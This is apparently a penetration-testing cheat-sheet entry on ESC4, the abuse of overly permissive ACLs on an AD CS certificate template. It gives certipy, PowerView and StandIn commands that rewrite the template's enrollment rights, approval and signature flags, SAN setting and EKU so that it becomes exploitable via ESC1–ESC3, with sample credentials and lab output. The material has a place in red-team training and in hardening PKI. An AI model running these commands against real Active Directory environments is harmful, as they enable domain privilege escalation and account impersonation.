ESC4

Performing ESC4 allows an attacker to introduce a misconfiguration to a template that is not vulnerable to begin with by abusing a certificate with overly-permissive ACLs; some rights that are critical for this abuse are:

• Owner - Full Control

• FullControl - Full Control

• WriteOwner - Modify Owner for grant Full Control

• WriteDacl - Modify access control for grant Full Control

• WriteProperty - Edit any properties

In order to modify a template we need to modify these values:

• Grant Enrollment rights for the vulnerable template

• Disable the PEND_ALL_REQUESTS flag in mspki-enrollment-flag to deactivate Manager Approval

• Set the mspki-ra-signature attribute to 0 to disable the Authorized Signature requirement

• Enable the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN

• Set the mspki-certificate-application-policy to a certificate purpose for authentication:

  • Client Authentication (OID: 1.3.6.1.5.5.7.3.2)

  • Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)

  • PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)

  • Any Purpose (OID: 2.5.29.37.0)

  • No Extended Key Usage (EKU)

These are the steps we can take to abuse a certificate template vulnerable to ESC4: first we make the changes to the certificates we have ACLs on and save the old configuration so that we can revert the changes at a later time

certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -save-old

now the ESC4 certificate should be vulnerable to all ESC techniques from 1 to 4 (included)

certipy find -u otter -p 'SomethingSecure123!' -dc-ip 10.10.10.10 -vulnerable -stdout

<SNIP>

ESC1 : 'LAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2  : 'LAB.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose
ESC3  : 'LAB.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4  : 'LAB.LOCAL\\Authenticated Users' has dangerous permissions

From this point on we can abuse any of the 3 misconfigurations (either ESC1, ESC2 or ESC3).

To revert the changes made to the certificate template we can use the JSON file generated with the previous certipy template command

certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -configuration ESC4.json

The certipy template command automates the process of setting up the misconfigurations completely but it's also possible to do it manually from a Windows host using the following commands and PowerView.

1. Add Certificate Enrollment Permissions to the Domain Users group

Add-DomainObjectAcl -TargetIdentity ESC4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=domain,DC=com" -Verbose

1. Disable manager approval requirement by setting the PEND_ALL_REQUESTS flag to 0x00000009 (0x00000001 + 0x00000008 for CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS and CT_FLAG_PUBLISH_TO_DS)

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-enrollment-flag'=9} -Verbose

1. Disable Authorized Signature Requirement by setting the mspki-ra-signature attribute to 0

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-ra-signature'=0} -Verbose

1. Enabling SAN Specification making the template vulnerable to ESC1 by setting the ENROLLEE_SUPPLIES_SUBJECT flag to 1

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-name-flag'=1} -Verbose

1. Adding PKI Extended Key Usage EKU and mspki-certificate-application-policy

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose

We can also do the same thing with StandIn, the following are the commands used to introduce a ESC1 misconfiguration into a certificate.

• Adding ENROLLEE_SUPPLIES_SUBJECT

.\StandIn.exe --ADCS --filter SecureUpdate --ess --add

• Add Certificate Enrollment Permissions to the Domain Users group

.\StandIn.exe --ADCS --filter SecureUpdate --ntaccount
"DOMAIN\domain users" --enroll --add

• Adding an EKU (in this case we'll use the Client Authentication EKU):

.\StandIn.exe --ADCS --filter SecureUpdate --clientauth --add